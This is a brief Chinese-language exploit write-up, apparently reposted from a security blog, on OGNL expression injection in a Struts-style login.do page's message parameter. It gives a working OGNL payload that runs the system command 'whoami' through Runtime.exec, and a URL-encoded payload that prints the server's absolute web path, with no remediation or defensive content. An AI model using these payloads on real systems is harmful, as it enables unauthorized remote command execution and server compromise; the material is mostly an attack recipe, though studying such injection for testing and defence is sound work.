Ognl 表达式注入

from:http://www.sh0w.top/index.php/archives/14/

http://www.2cto.com/article/201606/518202.html

1、登录页面如下  http://6.6.6.6/login.do? or http://6.6.6.6/login/login.do?

2、当账号密码报错的时候，出现如下URL login.do?message=104&verify=

3、直接改写message=的内容，试试算术运算。 http://6.6.6.6/login.do?message=66*66*66-66666

4、表达式注入。 有的表达式注入是${code}。这里隐藏了${}，所以直接调用就行了。 @org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream())

爆绝对路径

%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D

本文始发于微信公众号（关注安全技术）：Ognl 表达式注入